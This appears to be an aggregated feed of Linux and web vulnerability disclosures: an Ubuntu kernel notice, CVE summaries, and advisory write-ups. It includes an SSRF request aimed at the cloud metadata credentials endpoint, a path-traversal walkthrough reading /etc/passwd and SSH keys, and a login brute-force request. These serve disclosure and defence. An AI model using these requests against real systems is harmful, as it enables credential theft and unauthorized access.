Ubuntu Security Notice 5976-1 - It was discovered that the Upper Level Protocol subsystem in the Linux kernel did not properly handle sockets entering the LISTEN state in certain protocols, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. It was discovered that the KVM VMX implementation in the Linux kernel did not properly handle indirect branch prediction isolation between L1 and L2 VMs. An attacker in a guest VM could use this to expose sensitive information from the host OS or other guest VMs.

==========================================================================  
Ubuntu Security Notice USN-5976-1  
March 27, 2023

linux-oem-5.14, linux-oem-5.17 vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-oem-5.17: Linux kernel for OEM systems  
- linux-oem-5.14: Linux kernel for OEM systems

Details:

It was discovered that the Upper Level Protocol (ULP) subsystem in the  
Linux kernel did not properly handle sockets entering the LISTEN state in  
certain protocols, leading to a use-after-free vulnerability. A local  
attacker could use this to cause a denial of service (system crash) or  
possibly execute arbitrary code. (CVE-2023-0461)

It was discovered that the KVM VMX implementation in the Linux kernel did  
not properly handle indirect branch prediction isolation between L1 and L2  
VMs. An attacker in a guest VM could use this to expose sensitive  
information from the host OS or other guest VMs. (CVE-2022-2196)

It was discovered that the Intel 740 frame buffer driver in the Linux  
kernel contained a divide by zero vulnerability. A local attacker could use  
this to cause a denial of service (system crash). (CVE-2022-3061)

It was discovered that the Broadcom FullMAC USB WiFi driver in the Linux  
kernel did not properly perform bounds checking in some situations. A  
physically proximate attacker could use this to craft a malicious USB  
device that when inserted, could cause a denial of service (system crash)  
or possibly execute arbitrary code. (CVE-2022-3628)

Ziming Zhang discovered that the VMware Virtual GPU DRM driver in the Linux  
kernel contained an out-of-bounds write vulnerability. A local attacker  
could use this to cause a denial of service (system crash).  
(CVE-2022-36280)

It was discovered that the NILFS2 file system implementation in the Linux  
kernel did not properly deallocate memory in certain error conditions. An  
attacker could use this to cause a denial of service (memory exhaustion).  
(CVE-2022-3646)

Khalid Masum discovered that the NILFS2 file system implementation in the  
Linux kernel did not properly handle certain error conditions, leading to a  
use-after-free vulnerability. A local attacker could use this to cause a  
denial of service or possibly execute arbitrary code. (CVE-2022-3649)

It was discovered that a race condition existed in the Roccat HID driver in  
the Linux kernel, leading to a use-after-free vulnerability. A local  
attacker could use this to cause a denial of service (system crash) or  
possibly execute arbitrary code. (CVE-2022-41850)

Kyle Zeng discovered that the IPv6 implementation in the Linux kernel  
contained a NULL pointer dereference vulnerability in certain situations. A  
local attacker could use this to cause a denial of service (system crash).  
(CVE-2023-0394)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS:  
   linux-image-5.17.0-1029-oem     5.17.0-1029.30  
   linux-image-oem-22.04           5.17.0.1029.27  
   linux-image-oem-22.04a          5.17.0.1029.27

Ubuntu 20.04 LTS:  
   linux-image-5.14.0-1059-oem     5.14.0-1059.67  
   linux-image-oem-20.04           5.14.0.1059.57  
   linux-image-oem-20.04b          5.14.0.1059.57  
   linux-image-oem-20.04c          5.14.0.1059.57  
   linux-image-oem-20.04d          5.14.0.1059.57

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-5976-1  
   CVE-2022-2196, CVE-2022-3061, CVE-2022-3628, CVE-2022-36280,  
   CVE-2022-3646, CVE-2022-3649, CVE-2022-41850, CVE-2023-0394,  
   CVE-2023-0461

Package Information:  
   https://launchpad.net/ubuntu/+source/linux-oem-5.17/5.17.0-1029.30  
   https://launchpad.net/ubuntu/+source/linux-oem-5.14/5.14.0-1059.67

Ubuntu Security Notice USN-5976-1

X-Skipper-Proxy version 0.13.237 suffers from a server-side request forgery vulnerability.

    #Exploit Title: X-Skipper-Proxy v0.13.237 - Server Side Request Forgery (SSRF)#Date: 24/10/2022#Exploit Author: Hosein Vita & Milad Fadavvi#Vendor Homepage: https://github.com/zalando/skipper#Software Link: https://github.com/zalando/skipper#Version: < v0.13.237#Tested on: Linux#CVE: CVE-2022-38580Summary:Skipper prior to version v0.13.236 is vulnerable to server-side request forgery (SSRF). An attacker can exploit a vulnerable version of proxy to access the internal metadata server or other unauthenticated URLs by adding an specific header (X-Skipper-Proxy) to the http request.Proof Of Concept:1- Add header "X-Skipper-Proxy"  to your request2- Add the aws metadata to the pathGET /latest/meta-data/iam/security-credentials HTTP/1.1Host: yourskipperdomain.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36X-Skipper-Proxy: http://169.254.169.254Connection: closeReference:https://github.com/zalando/skipper/security/advisories/GHSA-f2rj-m42r-6jm2

X-Skipper-Proxy 0.13.237 Server-Side Request Forgery

amano Xparc parking solutions 7.1.3879 was discovered to be vulnerable to local file inclusion.

**Introduction**

Hello everyone, during one of the penetration testing assessments, we faced Amano Xparc parking solution web application. While conducting the assessment we discovered multiple vulnerabilities and we submitted it to https://cve.mitre.org/. For your reference the links for the other CVEs blogs:

*   **SQL injection CVE-2023–23331:** https://0xhunter20.medium.com/how-i-found-my-first-blind-sql-injection-cve-2023-23331-aef103a7f73c

Today I will be demonstrating CVE-2023–23330.

**Vulnerability Details**

*   **Vulnerable Software**: Amano Xoffice parking solutions
*   **Vulnerability:** Local File Inclusion
*   **Affected Version:** 7.1 (7.1.3879)
*   **Vendor Homepage:**https://www.amano.eu/en/
*   **CVE:** CVE**\-**2023–23330

**What is Local File Inclusion (LFI)?**

_“Local file inclusion (also known as LFI) is the process of including files, that are already locally present on the server, through the exploiting of vulnerable inclusion procedures implemented in the application”_

_\- OWASP_

To simplify things, LFI is a vulnerability that abuses a flaw when a server tries to include a file. The idea is to let the include unattended files such as system files or non-published documents.

**Why LFI is there? and how to prevent it.**

It occurs due to the use of user input without validation.

Preventing LFI could be done by considering the following:

*   Avoid passing user-submitted input to the system.
*   Whitelist files that can be included.
*   Reject un-defined/Whitelisted document.
*   Do not permit file paths to be appended directly make them hard-coded.
*   Use databases instead of filesystems. Either to store the files in the database or store the file path in the database.

**CVE Demo**

While exploring the website manually, I noticed a page to download the user manual and guide. I intercepted the request in burp so I can use Burp repeater for easier request manipulation. The image below shows the parameter and user manual file:

So, clearly, the “file” parameter in the GET request is responsible for specifying the file name. interesting…

Let’s try to change the file name to “/etc/passwd” which is a default file in Linux/Unix servers and readable by all users. The image below shows the try to inject “/etc/passwd”:

So, it didn’t work directly, as the error shows in the HTTP response the file “../manuals/etc/passwd” was not found.

**No Problem!**

Instead of using the absolute path of “/etc/passwd” we will use the relative path. In file systems to get a file there are two main ways “absolute” or “relative”.

Now let’s fuzz the relative path to know what is the depth of the file. We can use Burp intruder, python scripts, or manually in Burp repeater. The image below shows the first try with a depth of 2 manually in the Burp repeater:

Didn’t work, let’s try depth 3

**It worked!**

We were able to include a file from the system without any validation.

The question now is, how to abuse that?

There are multiple ways to exploit this and gain more. Each case or scenario has its own way to go further. However, I may suggest looking into:

*   **Config files & Source code**: most of the time DB credentials, API tokens …etc. Are stored in clear-text format either in Config files or source code.
*   **Well-Known files**: You may try to access well-known files such as Shadow file, log files, bash history, SSH keys …etc.

For the sake of knowledge, let’s try an example of a source code and SSH key.

SSH key file

Version.php file

****Acknowledgment:****

I would like to thank the teammates: Fahad Almulhim (0xHunter) and Osama Aldosari. Also, many thanks to the Saudi information and technology company — SITE for their continuous support.

**References:**

*   https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23330
*   https://0xhunter20.medium.com/how-i-found-my-first-blind-sql-injection-cve-2023-23331-aef103a7f73c
*   https://owasp.org/www-project-web-security-testing-guide/v42/4-Web\_Application\_Security\_Testing/07-Input\_Validation\_Testing/11.1-Testing\_for\_Local\_File\_Inclusion

CVE-2023-23330: Amano Xparc Local File Inclusion (CVE-2023–23330) - Saleh - Medium

A bug affects the Linux kernel’s ksmbd NTLMv2 authentication and is known to crash the OS immediately in Linux-based systems.

A security researcher has discovered that the Linux kernel is affected by a potentially serious vulnerability that can be exploited by a remote, unauthenticated attacker to launch denial-of-service (DoS) attacks.

Tracked as CVE-2023-0210, the bug affects the Linux kernel’s ksmbd NTLMv2 authentication and is known to crash the OS immediately in Linux-based systems. KSMBD is an open-source In-kernel CIFS/SMB3 server created by Namjae Jeon for Linux Kernel. It’s an implementation of SMB/CIFS protocol in kernel space for sharing files and IPC services over the network.

Exploiting the flaw requires sending malformed packets, respectively, to a targeted server, personal computer, tablet, or smartphone. The attack triggers _“a heap overflow bug in ksmbd\_decode\_ntlmssp\_auth\_blob in which nt\_len can be less than CIFS\_ENCPWD\_SIZE. This results in a negative blen argument for ksmbd\_auth\_ntlmv2, where it calls memcpy using blen on memory allocated by kmalloc(blen + CIFS\_CRYPTO\_KEY\_SIZE). Note that CIFS\_ENCPWD\_SIZE is 16 and CIFS\_CRYPTO\_KEY\_SIZE is 8. We believe this bug can only result in a remote DOS and not privilege escalation nor RCE, as the heap overflow occurs when blen is in range (-8, -1\].”_

The vulnerability exists due to the way versions 5.15-rc1 and later of the Linux kernel handle NTLMv2 authentication. Linux kernel developers haven’t released a patch. CVE-2023-0210 was proven to allow for remote panic in the OS immediately on the Ubuntu 20.04 HWE and 22.04 (both running on 5.15.0-56-generic).

Proof of concept code is currently available online, which somewhat increases the immediate danger to device owners. It’s recommended that users update Linux servers immediately and apply the patches for other distros as soon as they are available.

CVE-2023-0210: CVE-2023-0210: Flaw in Linux Kernel Allows Unauthenticated remote DOS Attacks

A buffer overflow vulnerability was found in the Netfilter subsystem in the Linux Kernel. This issue could allow the leakage of both stack and heap addresses, and potentially allow Local Privilege Escalation to the root user via arbitrary code execution.

'2161713?cve=title' is not a valid bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2023-0179: Invalid Bug ID

Improper Restriction of Excessive Authentication Attempts in GitHub repository linagora/twake prior to 0.0.0.

**Description**

Twake does not limit unsuccessfull login attempts allowing an attacker to brute force the password of an administrator or regular user.

**Proof of Concept**

Steps to reproduce Because Twake does not rate limit authentication attempts an attacker could either bruteforce both the login and password. However in a real world scenario we would liekly see an attacker either create an account and enumerate users or leverage a compromised account to obtain a user list.

Then a malicious actor would capture the login request with Burpsuite

Send the request to Intruder

Replay the login request with a different password value utilziing a password list payload such as rockyou.txt

Should the correct password be tried, a 200 OK response is returned

Incorrect attempts are returned with a 404 Unauthorized

Burpsuite will continue attempting all passwords in the password list until it is complete

Burpuite Replay:

    POST /internal/services/console/v1/login HTTP/1.1
    Host: 127.0.0.1:3000
    Content-Length: 77
    sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
    Accept: application/json
    Content-Type: application/json
    sec-ch-ua-mobile: ?0
    Authorization: Bearer
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
    sec-ch-ua-platform: "Linux"
    Origin: http://127.0.0.1:3000
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: http://127.0.0.1:3000/login
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: lhc_vid=6329efff387471209bb0
    Connection: close
    
    {"email":"admin@localhost.com","password":"adminadmin","remember_me":true,"device":{}}
    

**Impact**

The impact is unlimited password attempts leading to Brute Force attacks on the login page. Should this application be hosted on a website it may also lead to a Denial of Service.

**Occurrences**

CVE-2023-1665: No Protection Against Bruteforce Attacks on Login Page in twake

A flaw was found in the Linux Kernel. The tun/tap sockets have their socket UID hardcoded to 0 due to a type confusion in their initialization function. While it will be often correct, as tuntap devices require CAP_NET_ADMIN, it may not always be the case, e.g., a non-root user only having that capability. This would make tun/tap sockets being incorrectly treated in filtering/routing decisions, possibly bypassing network filters.

CVE-2023-1076

A memory corruption flaw was found in the Linux kernel’s human interface device (HID) subsystem in how a user inserts a malicious USB device. This flaw allows a local user to crash or potentially escalate their privileges on the system.

CVE-2023-1073

A memory leak flaw was found in the Linux kernel's Stream Control Transmission Protocol. This issue may occur when a user starts a malicious networking service and someone connects to this service. This could allow a local user to starve resources, causing a denial of service.

CVE-2023-1074

A flaw was found in the Linux kernel. A use-after-free may be triggered in asus_kbd_backlight_set when plugging/disconnecting in a malicious USB device, which advertises itself as an Asus device. Similarly to the previous known CVE-2023-25012, but in asus devices, the work_struct may be scheduled by the LED controller while the device is disconnecting, triggering a use-after-free on the struct asus_kbd_leds *led structure. A malicious USB device may exploit the issue to cause memory corruption with controlled data.

Tag

#linux